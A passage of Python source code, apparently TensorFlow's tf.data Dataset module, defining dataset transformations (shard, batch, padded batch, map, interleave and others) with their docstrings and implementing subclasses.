    Dataset.range(5, 1, -2) == [5, 3]
    ```

    Args:
      *args: follow same semantics as python's xrange.
        len(args) == 1 -> start = 0, stop = args[0], step = 1
        len(args) == 2 -> start = args[0], stop = args[1], step = 1
        len(args) == 3 -> start = args[0], stop = args[1], step = args[2]

    Returns:
      A `RangeDataset`.

    Raises:
      ValueError: if len(args) == 0.
    """
    return RangeDataset(*args)

  @staticmethod
  def zip(datasets):
    """Creates a `Dataset` by zipping together the given datasets.

    This method has similar semantics to the built-in `zip()` function
    in Python, with the main difference being that the `datasets`
    argument can be an arbitrary nested structure of `Dataset` objects.
    For example:

    ```python
    # NOTE: The following examples use `{ ... }` to represent the
    # contents of a dataset.
    a = { 1, 2, 3 }
    b = { 4, 5, 6 }
    c = { (7, 8), (9, 10), (11, 12) }
    d = { 13, 14 }

    # The nested structure of the `datasets` argument determines the
    # structure of elements in the resulting dataset.
    Dataset.zip((a, b)) == { (1, 4), (2, 5), (3, 6) }
    Dataset.zip((b, a)) == { (4, 1), (5, 2), (6, 3) }

    # The `datasets` argument may contain an arbitrary number of
    # datasets.
    Dataset.zip((a, b, c)) == { (1, 4, (7, 8)),
                                (2, 5, (9, 10)),
                                (3, 6, (11, 12)) }

    # The number of elements in the resulting dataset is the same as
    # the size of the smallest dataset in `datasets`.
    Dataset.zip((a, d)) == { (1, 13), (2, 14) }
    ```

    Args:
      datasets: A nested structure of datasets.

    Returns:
      A `Dataset`.
    """
    return ZipDataset(datasets)

  def concatenate(self, dataset):
    """Creates a `Dataset` by concatenating given dataset with this dataset.

    ```python
    # NOTE: The following examples use `{ ... }` to represent the
    # contents of a dataset.
    a = { 1, 2, 3 }
    b = { 4, 5, 6, 7 }

    # Input dataset and dataset to be concatenated should have same
    # nested structures and output types.
    # c = { (8, 9), (10, 11), (12, 13) }
    # d = { 14.0, 15.0, 16.0 }
    # a.concatenate(c) and a.concatenate(d) would result in error.

    a.concatenate(b) == { 1, 2, 3, 4, 5, 6, 7 }
    ```

    Args:
      dataset: `Dataset` to be concatenated.

    Returns:
      A `Dataset`.
    """
    return ConcatenateDataset(self, dataset)

  def prefetch(self, buffer_size):
    """Creates a `Dataset` that prefetches elements from this dataset.

    Args:
      buffer_size: A `tf.int64` scalar `tf.Tensor`, representing the
        maximum number of elements that will be buffered when prefetching.

    Returns:
      A `Dataset`.
    """
    return PrefetchDataset(self, buffer_size)

  @staticmethod
  def list_files(file_pattern):
    """A dataset of all files matching a pattern.

    Example:
      If we had the following files on our filesystem:
        - /path/to/dir/a.txt
        - /path/to/dir/b.py
        - /path/to/dir/c.py
      If we pass "/path/to/dir/*.py" as the directory, the dataset would
      produce:
        - /path/to/dir/b.py
        - /path/to/dir/c.py

    Args:
      file_pattern: A string or scalar string `tf.Tensor`, representing
        the filename pattern that will be matched.

    Returns:
     A `Dataset` of strings corresponding to file names.
    """
    return Dataset.from_tensor_slices(gen_io_ops.matching_files(file_pattern))

  def repeat(self, count=None):
    """Repeats this dataset `count` times.

    Args:
      count: (Optional.) A `tf.int64` scalar `tf.Tensor`, representing the
        number of times the elements of this dataset should be repeated. The
        default behavior (if `count` is `None` or `-1`) is for the elements to
        be repeated indefinitely.

    Returns:
      A `Dataset`.
    """
    return RepeatDataset(self, count)

  def _enumerate(self, start=0):
    # Pairs each element with a monotonically increasing int64 index,
    # starting from `start`. The range is bounded by the int64 maximum.
    max_value = np.iinfo(dtypes.int64.as_numpy_dtype).max
    return Dataset.zip((Dataset.range(start, max_value), self))

  def shuffle(self, buffer_size, seed=None, reshuffle_each_iteration=None):
    """Randomly shuffles the elements of this dataset.

    Args:
      buffer_size: A `tf.int64` scalar `tf.Tensor`, representing the
        number of elements from this dataset from which the new
        dataset will sample.
      seed: (Optional.) A `tf.int64` scalar `tf.Tensor`, representing the
        random seed that will be used to create the distribution. See
        @{tf.set_random_seed} for behavior.
      reshuffle_each_iteration: (Optional.) A boolean, which if true indicates
        that the dataset should be pseudorandomly reshuffled each time it is
        iterated over. (Defaults to `True`.)

    Returns:
      A `Dataset`.
    """
    return ShuffleDataset(self, buffer_size, seed, reshuffle_each_iteration)

  def cache(self, filename=""):
    """Caches the elements in this dataset.

    Args:
      filename: A `tf.string` scalar `tf.Tensor`, representing the name of a
        directory on the filesystem to use for caching tensors in this Dataset.
        If a filename is not provided, the dataset will be cached in memory.

    Returns:
      A `Dataset`.
    """
    return CacheDataset(self, filename)

  def take(self, count):
    """Creates a `Dataset` with at most `count` elements from this dataset.

    Args:
      count: A `tf.int64` scalar `tf.Tensor`, representing the number of
        elements of this dataset that should be taken to form the new dataset.
        If `count` is -1, or if `count` is greater than the size of this
        dataset, the new dataset will contain all elements of this dataset.

    Returns:
      A `Dataset`.
    """
    return TakeDataset(self, count)

  def skip(self, count):
    """Creates a `Dataset` that skips `count` elements from this dataset.

    Args:
      count: A `tf.int64` scalar `tf.Tensor`, representing the number
        of elements of this dataset that should be skipped to form the
        new dataset.  If `count` is greater than the size of this
        dataset, the new dataset will contain no elements.  If `count`
        is -1, skips the entire dataset.

    Returns:
      A `Dataset`.
    """
    return SkipDataset(self, count)

  def shard(self, num_shards, index):
    """Creates a `Dataset` that includes only 1/`num_shards` of this dataset.

    This dataset operator is very useful when running distributed training, as
    it allows each worker to read a unique subset.

    When reading a single input file, you can skip elements as follows:

    ```python
    d = tf.data.TFRecordDataset(FLAGS.input_file)
    d = d.shard(FLAGS.num_workers, FLAGS.worker_index)
    d = d.repeat(FLAGS.num_epochs)
    d = d.shuffle(FLAGS.shuffle_buffer_size)
    d = d.map(parser_fn, num_parallel_calls=FLAGS.num_map_threads)
    ```

    Important caveats:

    - Be sure to shard before you use any randomizing operator (such as
      shuffle).
    - Generally it is best if the shard operator is used early in the dataset
      pipeline. For example, when reading from a set of TFRecord files, shard
      before converting the dataset to input samples. This avoids reading every
      file on every worker. The following is an example of an efficient
      sharding strategy within a complete pipeline:

    ```python
    d = Dataset.list_files(FLAGS.pattern)
    d = d.shard(FLAGS.num_workers, FLAGS.worker_index)
    d = d.repeat(FLAGS.num_epochs)
    d = d.shuffle(FLAGS.shuffle_buffer_size)
    d = d.repeat()
    d = d.interleave(tf.data.TFRecordDataset,
                     cycle_length=FLAGS.num_readers, block_length=1)
    d = d.map(parser_fn, num_parallel_calls=FLAGS.num_map_threads)
    ```

    Args:
      num_shards: A `tf.int64` scalar `tf.Tensor`, representing the number of
        shards operating in parallel.
      index: A `tf.int64` scalar `tf.Tensor`, representing the worker index.

    Returns:
      A `Dataset`.

    Raises:
      ValueError: if `num_shards` or `index` are illegal values. Note: error
        checking is done on a best-effort basis, and aren't guaranteed to be
        caught upon dataset creation. (e.g. providing in a placeholder tensor
        bypasses the early checking, and will instead result in an error during
        a session.run call.)
    """
    num_shards = ops.convert_to_tensor(
        num_shards, name="num_shards", dtype=dtypes.int64)
    num_shards_static = tensor_util.constant_value(num_shards)
    index = ops.convert_to_tensor(index, name="index", dtype=dtypes.int64)
    index_static = tensor_util.constant_value(index)

    # Best-effort static validation; dynamic (placeholder) values bypass it.
    if num_shards_static is not None and num_shards_static < 1:
      raise ValueError("num_shards must be >= 1; got: %s" % num_shards_static)
    if index_static is not None and index_static < 0:
      raise ValueError("index must be >= 0; got: %s" % index_static)
    if (index_static is not None and num_shards_static is not None and
        index_static >= num_shards_static):
      # FIX: the message previously read "index must be <= num_shards", which
      # contradicted the check above (index must be strictly less).
      raise ValueError("index must be < num_shards; %s is not < %s" %
                       (index_static, num_shards_static))

    def filter_fn(elem_index, _):
      mod_result = math_ops.mod(elem_index, num_shards)
      return math_ops.equal(mod_result, index)

    return self._enumerate().filter(filter_fn).map(lambda _, elem: elem)

  def batch(self, batch_size):
    """Combines consecutive elements of this dataset into batches.

    Args:
      batch_size: A `tf.int64` scalar `tf.Tensor`, representing the number of
        consecutive elements of this dataset to combine in a single batch.

    Returns:
      A `Dataset`.
    """
    return BatchDataset(self, batch_size)

  def padded_batch(self, batch_size, padded_shapes, padding_values=None):
    """Combines consecutive elements of this dataset into padded batches.

    Like `Dataset.dense_to_sparse_batch()`, this method combines
    multiple consecutive elements of this dataset, which might have
    different shapes, into a single element. The tensors in the
    resulting element have an additional outer dimension, and are
    padded to the respective shape in `padded_shapes`.

    Args:
      batch_size: A `tf.int64` scalar `tf.Tensor`, representing the number of
        consecutive elements of this dataset to combine in a single batch.
      padded_shapes: A nested structure of `tf.TensorShape` or
        `tf.int64` vector tensor-like objects representing the shape
        to which the respective component of each input element should
        be padded prior to batching. Any unknown dimensions
        (e.g. `tf.Dimension(None)` in a `tf.TensorShape` or `-1` in a
        tensor-like object) will be padded to the maximum size of that
        dimension in each batch.
      padding_values: (Optional.) A nested structure of scalar-shaped
        `tf.Tensor`, representing the padding values to use for the
        respective components.  Defaults are `0` for numeric types and
        the empty string for string types.

    Returns:
      A `Dataset`.
    """
    return PaddedBatchDataset(self, batch_size, padded_shapes, padding_values)

  def map(self, map_func, num_parallel_calls=None):
    """Maps `map_func` across this dataset.

    Args:
      map_func: A function mapping a nested structure of tensors (having
        shapes and types defined by `self.output_shapes` and
       `self.output_types`) to another nested structure of tensors.
      num_parallel_calls: (Optional.) A `tf.int32` scalar `tf.Tensor`,
        representing the number of elements to process in parallel. If not
        specified, elements will be processed sequentially.

    Returns:
      A `Dataset`.
    """
    if num_parallel_calls is None:
      return MapDataset(self, map_func)
    else:
      return ParallelMapDataset(self, map_func, num_parallel_calls)

  def flat_map(self, map_func):
    """Maps `map_func` across this dataset and flattens the result.

    Args:
      map_func: A function mapping a nested structure of tensors (having shapes
        and types defined by `self.output_shapes` and `self.output_types`) to a
        `Dataset`.

    Returns:
      A `Dataset`.
    """
    return FlatMapDataset(self, map_func)

  def interleave(self, map_func, cycle_length, block_length=1):
    """Maps `map_func` across this dataset, and interleaves the results.

    For example, you can use `Dataset.interleave()` to process many input files
    concurrently:

    ```python
    # Preprocess 4 files concurrently, and interleave blocks of 16 records from
    # each file.
    filenames = ["/var/data/file1.txt", "/var/data/file2.txt", ..."]
    dataset = (Dataset.from_tensor_slices(filenames)
               .interleave(lambda x:
                   TextLineDataset(x).map(parse_fn, num_parallel_calls=1),
                   cycle_length=4, block_length=16))
    ```

    The `cycle_length` and `block_length` arguments control the order in which
    elements are produced. `cycle_length` controls the number of input elements
    that are processed concurrently. If you set `cycle_length` to 1, this
    transformation will handle one input element at a time, and will produce
    identical results to @{tf.data.Dataset.flat_map}. In general,
    this transformation will apply `map_func` to `cycle_length` input elements,
    open iterators on the returned `Dataset` objects, and cycle through them
    producing `block_length` consecutive elements from each iterator, and
    consuming the next input element each time it reaches the end of an
    iterator.

    For example:

    ```python
    # NOTE: The following examples use `{ ... }` to represent the
    # contents of a dataset.
    a = { 1, 2, 3, 4, 5 }

    # NOTE: New lines indicate "block" boundaries.
    a.interleave(lambda x: Dataset.from_tensors(x).repeat(6),
                 cycle_length=2, block_length=4) == {
        1, 1, 1, 1,
        2, 2, 2, 2,
        1, 1,
        2, 2,
        3, 3, 3, 3,
        4, 4, 4, 4,
        3, 3,
        4, 4,
        5, 5, 5, 5,
        5, 5,
    }
    ```

    NOTE: The order of elements yielded by this transformation is
    deterministic, as long as `map_func` is a pure function. If
    `map_func` contains any stateful operations, the order in which
    that state is accessed is undefined.

    Args:
      map_func: A function mapping a nested structure of tensors (having shapes
        and types defined by `self.output_shapes` and `self.output_types`) to a
        `Dataset`.
      cycle_length: The number of elements from this dataset that will be
        processed concurrently.
      block_length: The number of consecutive elements to produce from each
        input element before cycling to another input element.

    Returns:
      A `Dataset`.
    """
    return InterleaveDataset(self, map_func, cycle_length, block_length)

  def filter(self, predicate):
    """Filters this dataset according to `predicate`.

    Args:
      predicate: A function mapping a nested structure of tensors (having shapes
        and types defined by `self.output_shapes` and `self.output_types`) to a
        scalar `tf.bool` tensor.

    Returns:
      A `Dataset`.
    """
    return FilterDataset(self, predicate)

  def apply(self, transformation_func):
    """Apply a transformation function to this dataset.

    `apply` enables chaining of custom `Dataset` transformations, which are
    represented as functions that take one `Dataset` argument and return a
    transformed `Dataset`.

    For example:

    ```
    dataset = (dataset.map(lambda x: x ** 2)
               .apply(group_by_window(key_func, reduce_func, window_size))
               .map(lambda x: x ** 3))
    ```

    Args:
      transformation_func: A function that takes one `Dataset` argument and
        returns a `Dataset`.

    Returns:
      The `Dataset` returned by applying `transformation_func` to this dataset.
    """
    dataset = transformation_func(self)
    if not isinstance(dataset, Dataset):
      raise TypeError("`transformation_func` must return a Dataset.")
    return dataset
class TensorDataset(Dataset):
  """A `Dataset` with a single element, viz. a nested structure of tensors."""

  def __init__(self, tensors):
    """See `Dataset.from_tensors()` for details."""
    super(TensorDataset, self).__init__()
    with ops.name_scope("tensors"):
      converted = []
      for idx, component in enumerate(nest.flatten(tensors)):
        converted.append(
            ops.convert_to_tensor(component, name="component_%d" % idx))
      # Restore the caller's nested structure around the converted tensors.
      self._tensors = nest.pack_sequence_as(tensors, converted)

  def _as_variant_tensor(self):
    return gen_dataset_ops.tensor_dataset(
        nest.flatten(self._tensors),
        output_shapes=nest.flatten(self.output_shapes))

  @property
  def output_shapes(self):
    flat = nest.flatten(self._tensors)
    return nest.pack_sequence_as(self._tensors, [t.shape for t in flat])

  @property
  def output_types(self):
    flat = nest.flatten(self._tensors)
    return nest.pack_sequence_as(self._tensors, [t.dtype for t in flat])
class TensorSliceDataset(Dataset):
  """A `Dataset` of slices from a nested structure of tensors."""

  def __init__(self, tensors):
    """See `Dataset.from_tensor_slices()` for details."""
    super(TensorSliceDataset, self).__init__()
    with ops.name_scope("tensors"):
      components = []
      for idx, component in enumerate(nest.flatten(tensors)):
        components.append(
            ops.convert_to_tensor(component, name="component_%d" % idx))
      self._tensors = nest.pack_sequence_as(tensors, components)
      # Every component is sliced along dimension 0, so all components must
      # agree on the size of that dimension.
      leading_dim = components[0].get_shape()[0]
      for component in components[1:]:
        leading_dim.assert_is_compatible_with(component.get_shape()[0])

  def _as_variant_tensor(self):
    return gen_dataset_ops.tensor_slice_dataset(
        nest.flatten(self._tensors),
        output_shapes=nest.flatten(self.output_shapes))

  @property
  def output_shapes(self):
    # Each element's shape is the component shape with the sliced (0th)
    # dimension removed.
    flat = nest.flatten(self._tensors)
    return nest.pack_sequence_as(
        self._tensors, [tensor_shape.TensorShape(t.shape[1:]) for t in flat])

  @property
  def output_types(self):
    flat = nest.flatten(self._tensors)
    return nest.pack_sequence_as(self._tensors, [t.dtype for t in flat])
class SparseTensorSliceDataset(Dataset):
  """A `Dataset` that splits a rank-N `tf.SparseTensor` into its rows."""

  def __init__(self, sparse_tensor):
    """See `Dataset.from_sparse_tensor_slices()` for details."""
    super(SparseTensorSliceDataset, self).__init__()
    if not isinstance(sparse_tensor, sparse_tensor_lib.SparseTensor):
      raise TypeError("`sparse_tensor` must be a `tf.SparseTensor` object.")
    self._sparse_tensor = sparse_tensor

  def _as_variant_tensor(self):
    st = self._sparse_tensor
    return gen_dataset_ops.sparse_tensor_slice_dataset(
        st.indices, st.values, st.dense_shape)

  @property
  def output_shapes(self):
    # Each sliced element has rank one less than the input; the static rank
    # can be recovered from either the indices matrix (columns - 1) or the
    # dense_shape vector (length - 1), so merge the two.
    indices_shape = self._sparse_tensor.indices.get_shape()
    shape_shape = self._sparse_tensor.dense_shape.get_shape()
    rank = (indices_shape[1] - 1).merge_with(shape_shape[0] - 1)
    # The number of values per slice is not statically known.
    num_values = tensor_shape.Dimension(None)
    return (tensor_shape.TensorShape([num_values, rank]),
            tensor_shape.TensorShape([num_values]),
            tensor_shape.TensorShape([rank]))

  @property
  def output_types(self):
    # Elements are (indices, values, dense_shape) triples.
    return (dtypes.int64, self._sparse_tensor.dtype, dtypes.int64)
class ZipDataset(Dataset):
  """A `Dataset` that zips its inputs together."""

  def __init__(self, datasets):
    """See `Dataset.zip()` for details."""
    super(ZipDataset, self).__init__()
    for ds in nest.flatten(datasets):
      if isinstance(ds, Dataset):
        continue
      # Give a more specific hint when the caller nested datasets in a
      # Python list, which `nest` treats as a leaf rather than a structure.
      if isinstance(ds, list):
        message = ("The argument to `Dataset.zip()` must be a nested "
                   "structure of `Dataset` objects. Nested structures do not "
                   "support Python lists; please use a tuple instead.")
      else:
        message = ("The argument to `Dataset.zip()` must be a nested "
                   "structure of `Dataset` objects.")
      raise TypeError(message)
    self._datasets = datasets

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    flat_datasets = nest.flatten(self._datasets)
    variant_tensors = [ds._as_variant_tensor() for ds in flat_datasets]
    flat_shapes = []
    flat_types = []
    for ds in flat_datasets:
      flat_shapes.extend(nest.flatten(ds.output_shapes))
      flat_types.extend(nest.flatten(ds.output_types))
    return gen_dataset_ops.zip_dataset(
        variant_tensors,
        output_shapes=flat_shapes,
        output_types=flat_types)
    # pylint: enable=protected-access

  @property
  def output_shapes(self):
    flat_datasets = nest.flatten(self._datasets)
    return nest.pack_sequence_as(
        self._datasets, [ds.output_shapes for ds in flat_datasets])

  @property
  def output_types(self):
    flat_datasets = nest.flatten(self._datasets)
    return nest.pack_sequence_as(
        self._datasets, [ds.output_types for ds in flat_datasets])
class ConcatenateDataset(Dataset):
  """A `Dataset` that concatenates its input with given dataset."""

  def __init__(self, input_dataset, dataset_to_concatenate):
    """See `Dataset.concatenate()` for details."""
    super(ConcatenateDataset, self).__init__()
    self._input_dataset = input_dataset
    self._dataset_to_concatenate = dataset_to_concatenate
    # The two datasets must agree on nested structure and on every
    # component's element type.
    nest.assert_same_structure(input_dataset.output_types,
                               dataset_to_concatenate.output_types)
    flat_input_types = nest.flatten(input_dataset.output_types)
    flat_other_types = nest.flatten(dataset_to_concatenate.output_types)
    for a, b in zip(flat_input_types, flat_other_types):
      if a != b:
        raise TypeError(
            "Two datasets to concatenate have different types %s and %s" %
            (input_dataset.output_types, dataset_to_concatenate.output_types))

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    return gen_dataset_ops.concatenate_dataset(
        self._input_dataset._as_variant_tensor(),
        self._dataset_to_concatenate._as_variant_tensor(),
        output_shapes=nest.flatten(self.output_shapes),
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)))
    # pylint: enable=protected-access

  @property
  def output_shapes(self):
    # For each component, report the most specific shape compatible with
    # the corresponding components of both inputs.
    flat_input = nest.flatten(self._input_dataset.output_shapes)
    flat_other = nest.flatten(self._dataset_to_concatenate.output_shapes)
    merged = [
        ts1.most_specific_compatible_shape(ts2)
        for ts1, ts2 in zip(flat_input, flat_other)
    ]
    return nest.pack_sequence_as(self._input_dataset.output_shapes, merged)

  @property
  def output_types(self):
    return self._input_dataset.output_types
class RepeatDataset(Dataset):
  """A `Dataset` that repeats its input several times."""

  def __init__(self, input_dataset, count):
    """See `Dataset.repeat()` for details."""
    super(RepeatDataset, self).__init__()
    self._input_dataset = input_dataset
    if count is None:
      # `None` is encoded as -1, which presumably signals "repeat
      # indefinitely" to the repeat kernel — see `Dataset.repeat()`.
      self._count = constant_op.constant(-1, dtype=dtypes.int64, name="count")
    else:
      self._count = ops.convert_to_tensor(
          count, dtype=dtypes.int64, name="count")

  def _as_variant_tensor(self):
    flat_shapes = nest.flatten(self.output_shapes)
    flat_types = nest.flatten(sparse.unwrap_sparse_types(self.output_types))
    return gen_dataset_ops.repeat_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        count=self._count,
        output_shapes=flat_shapes,
        output_types=flat_types)

  @property
  def output_shapes(self):
    # Repetition does not change the element structure.
    return self._input_dataset.output_shapes

  @property
  def output_types(self):
    return self._input_dataset.output_types
class RangeDataset(Dataset):
  """A `Dataset` of a step separated range of values."""

  def __init__(self, *args):
    """See `Dataset.range()` for details."""
    super(RangeDataset, self).__init__()
    self._parse_args(*args)

  def _parse_args(self, *args):
    # Mirror Python's built-in `range()` argument conventions.
    if len(args) == 1:
      start, stop, step = 0, args[0], 1
    elif len(args) == 2:
      start, stop, step = args[0], args[1], 1
    elif len(args) == 3:
      start, stop, step = args
    else:
      raise ValueError("Invalid arguments to RangeDataset: %s" % str(args))
    self._start = self._build_tensor(start, "start")
    self._stop = self._build_tensor(stop, "stop")
    self._step = self._build_tensor(step, "step")

  def _build_tensor(self, int64_value, name):
    # All range parameters are carried as named int64 scalars.
    return ops.convert_to_tensor(int64_value, dtype=dtypes.int64, name=name)

  def _as_variant_tensor(self):
    return gen_dataset_ops.range_dataset(
        start=self._start,
        stop=self._stop,
        step=self._step,
        output_shapes=nest.flatten(self.output_shapes),
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)))

  @property
  def output_shapes(self):
    # Each element is a scalar.
    return tensor_shape.scalar()

  @property
  def output_types(self):
    return dtypes.int64
class CacheDataset(Dataset):
  """A `Dataset` that caches elements of its input."""

  def __init__(self, input_dataset, filename):
    """See `Dataset.cache()` for details."""
    super(CacheDataset, self).__init__()
    self._input_dataset = input_dataset
    # Filename of the cache file; an empty string presumably selects
    # in-memory caching (see `Dataset.cache()`).
    self._filename = ops.convert_to_tensor(
        filename, dtype=dtypes.string, name="filename")

  def _as_variant_tensor(self):
    flat_shapes = nest.flatten(self.output_shapes)
    flat_types = nest.flatten(sparse.unwrap_sparse_types(self.output_types))
    return gen_dataset_ops.cache_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        filename=self._filename,
        output_shapes=flat_shapes,
        output_types=flat_types)

  @property
  def output_shapes(self):
    # Caching is transparent: element structure is unchanged.
    return self._input_dataset.output_shapes

  @property
  def output_types(self):
    return self._input_dataset.output_types
class ShuffleDataset(Dataset):
  """A `Dataset` that randomly shuffles the elements of its input."""

  def __init__(self,
               input_dataset,
               buffer_size,
               seed=None,
               reshuffle_each_iteration=None):
    """See `Dataset.shuffle()` for details."""
    super(ShuffleDataset, self).__init__()
    self._input_dataset = input_dataset
    self._buffer_size = ops.convert_to_tensor(
        buffer_size, dtype=dtypes.int64, name="buffer_size")

    def _to_seed_tensor(value, name):
      # A missing seed component is encoded as the constant 0.
      if value is None:
        return constant_op.constant(0, dtype=dtypes.int64, name=name)
      return ops.convert_to_tensor(value, dtype=dtypes.int64, name=name)

    # `random_seed.get_seed` combines the op-level seed with the graph seed.
    seed, seed2 = random_seed.get_seed(seed)
    self._seed = _to_seed_tensor(seed, "seed")
    self._seed2 = _to_seed_tensor(seed2, "seed2")
    # Default to reshuffling on every pass when the caller does not specify.
    self._reshuffle_each_iteration = (
        True if reshuffle_each_iteration is None else reshuffle_each_iteration)

  def _as_variant_tensor(self):
    return gen_dataset_ops.shuffle_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        buffer_size=self._buffer_size,
        seed=self._seed,
        seed2=self._seed2,
        reshuffle_each_iteration=self._reshuffle_each_iteration,
        output_shapes=nest.flatten(self.output_shapes),
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)))

  @property
  def output_shapes(self):
    return self._input_dataset.output_shapes

  @property
  def output_types(self):
    return self._input_dataset.output_types
class TakeDataset(Dataset):
  """A `Dataset` containing the first `count` elements from its input."""

  def __init__(self, input_dataset, count):
    """See `Dataset.take()` for details."""
    super(TakeDataset, self).__init__()
    self._input_dataset = input_dataset
    self._count = ops.convert_to_tensor(count, dtype=dtypes.int64, name="count")

  def _as_variant_tensor(self):
    flat_shapes = nest.flatten(self.output_shapes)
    flat_types = nest.flatten(sparse.unwrap_sparse_types(self.output_types))
    return gen_dataset_ops.take_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        count=self._count,
        output_shapes=flat_shapes,
        output_types=flat_types)

  @property
  def output_shapes(self):
    # Taking a prefix does not change the element structure.
    return self._input_dataset.output_shapes

  @property
  def output_types(self):
    return self._input_dataset.output_types
class SkipDataset(Dataset):
  """A `Dataset` skipping the first `count` elements from its input."""

  def __init__(self, input_dataset, count):
    """See `Dataset.skip()` for details."""
    super(SkipDataset, self).__init__()
    self._input_dataset = input_dataset
    self._count = ops.convert_to_tensor(count, dtype=dtypes.int64, name="count")

  def _as_variant_tensor(self):
    flat_shapes = nest.flatten(self.output_shapes)
    flat_types = nest.flatten(sparse.unwrap_sparse_types(self.output_types))
    return gen_dataset_ops.skip_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        count=self._count,
        output_shapes=flat_shapes,
        output_types=flat_types)

  @property
  def output_shapes(self):
    # Skipping a prefix does not change the element structure.
    return self._input_dataset.output_shapes

  @property
  def output_types(self):
    return self._input_dataset.output_types
class BatchDataset(Dataset):
  """A `Dataset` that batches contiguous elements from its input."""

  def __init__(self, input_dataset, batch_size):
    """See `Dataset.batch()` for details."""
    super(BatchDataset, self).__init__()
    if sparse.any_sparse(input_dataset.output_types):
      # TODO(b/63669786): support batching of sparse tensors
      raise TypeError("Batching of sparse tensors is not currently supported")
    self._input_dataset = input_dataset
    self._batch_size = ops.convert_to_tensor(
        batch_size, dtype=dtypes.int64, name="batch_size")

  def _as_variant_tensor(self):
    return gen_dataset_ops.batch_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        batch_size=self._batch_size,
        output_shapes=nest.flatten(self.output_shapes),
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)))

  @property
  def output_shapes(self):
    # Prepend an unknown batch dimension to every component shape.
    input_shapes = self._input_dataset.output_shapes
    batched = [
        tensor_shape.vector(None).concatenate(component)
        for component in nest.flatten(input_shapes)
    ]
    return nest.pack_sequence_as(input_shapes, batched)

  @property
  def output_types(self):
    return self._input_dataset.output_types
def _partial_shape_to_tensor(shape_like):
  """Converts a shape-like value to an int64 tensor, encoding unknown dims as -1."""
  try:
    # Preferred path: interpret the input as a `tf.TensorShape` and emit its
    # canonical tensor form, where every `None` dimension becomes -1.
    canonical = tensor_shape.as_shape(shape_like)
    return ops.convert_to_tensor(
        [-1 if dim is None else dim for dim in canonical.as_list()],
        dtype=dtypes.int64)
  except (TypeError, ValueError):
    # Not trivially convertible to a shape; fall back on the generic
    # tensor-conversion machinery.
    return ops.convert_to_tensor(shape_like, dtype=dtypes.int64)
def _padding_value_to_tensor(value, output_type):
  """Converts the padding value to a tensor.
  Args:
    value: The padding value.
    output_type: Its expected dtype.
  Returns:
    A scalar `Tensor`.
  Raises:
    ValueError: if the padding value is not a scalar.
    TypeError: if the padding value's type does not match `output_type`.
  """
  value = ops.convert_to_tensor(value, name="padding_value")
  # Padding values must be scalars: one value is broadcast per component.
  if not value.shape.is_compatible_with(tensor_shape.scalar()):
    raise ValueError("Padding value should be a scalar, but is not: %s" % value)
  # Exact dtype match is required; no implicit casting is performed.
  if value.dtype != output_type:
    raise TypeError("Padding value tensor (%s) does not match output type: %s" %
                    (value, output_type))
  return value
class PaddedBatchDataset(Dataset):
  """A `Dataset` that batches and pads contiguous elements from its input."""

  def __init__(self, input_dataset, batch_size, padded_shapes, padding_values):
    """See `Dataset.batch()` for details."""
    super(PaddedBatchDataset, self).__init__()
    if sparse.any_sparse(input_dataset.output_types):
      # TODO(b/63669786): support batching of sparse tensors
      raise TypeError("Batching of sparse tensors is not currently supported")
    self._input_dataset = input_dataset
    self._batch_size = ops.convert_to_tensor(
        batch_size, dtype=dtypes.int64, name="batch_size")
    if padding_values is None:
      padding_values = self._default_padding(input_dataset)
    # Map per-component, following the structure of the input elements.
    self._padded_shapes = nest.map_structure_up_to(
        input_dataset.output_shapes, _partial_shape_to_tensor, padded_shapes)
    self._padding_values = nest.map_structure_up_to(
        input_dataset.output_shapes, _padding_value_to_tensor, padding_values,
        input_dataset.output_types)

  def _default_padding(self, input_dataset):
    # Empty string for string components; a zero of the right dtype otherwise.
    def make_zero(t):
      if t.base_dtype == dtypes.string:
        return ""
      return np.zeros_like(t.as_numpy_dtype())
    return nest.map_structure(make_zero, input_dataset.output_types)

  def _as_variant_tensor(self):
    padded_shape_tensors = [
        ops.convert_to_tensor(s, dtype=dtypes.int64)
        for s in nest.flatten(self._padded_shapes)
    ]
    return gen_dataset_ops.padded_batch_dataset(
        self._input_dataset._as_variant_tensor(),  # pylint: disable=protected-access
        batch_size=self._batch_size,
        padded_shapes=padded_shape_tensors,
        padding_values=nest.flatten(self._padding_values),
        output_shapes=nest.flatten(self.output_shapes))

  @property
  def output_shapes(self):
    def _padded_shape_to_batch_shape(s):
      # Unknown batch dimension followed by the (statically known part of
      # the) padded component shape.
      return tensor_shape.vector(None).concatenate(
          tensor_util.constant_value_as_shape(s))
    return nest.map_structure(_padded_shape_to_batch_shape, self._padded_shapes)

  @property
  def output_types(self):
    return self._input_dataset.output_types
def _should_unpack_args(args):
  """Returns `True` if `args` should be `*args` when passed to a callable."""
  # NOTE: deliberately an exact `type` check rather than `isinstance`, so
  # that tuple subclasses (e.g. `collections.namedtuple` instances) are
  # passed to the callable as a single structured argument instead of
  # being unpacked into positional arguments.
  return type(args) is tuple  # pylint: disable=unidiomatic-typecheck
class MapDataset(Dataset):
  """A `Dataset` that maps a function over elements in its input."""
  def __init__(self, input_dataset, map_func):
    """See `Dataset.map()` for details."""
    super(MapDataset, self).__init__()
    self._input_dataset = input_dataset
    # Filled in as a side effect of tracing `tf_map_func` below; until the
    # Defun has been traced these remain None.
    self._output_shapes = None
    self._output_types = None
    @function.Defun(
        *nest.flatten(sparse.unwrap_sparse_types(input_dataset.output_types)))
    def tf_map_func(*args):
      """A wrapper for Defun that facilitates shape inference."""
      # Pass in shape information from the input_dataset.
      for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)):
        arg.set_shape(shape)
      # Re-nest the flat Defun arguments to match the element structure,
      # then rebuild any SparseTensor components from their serialized form.
      nested_args = nest.pack_sequence_as(input_dataset.output_types, args)
      nested_args = sparse.deserialize_sparse_tensors(
          nested_args, input_dataset.output_types)
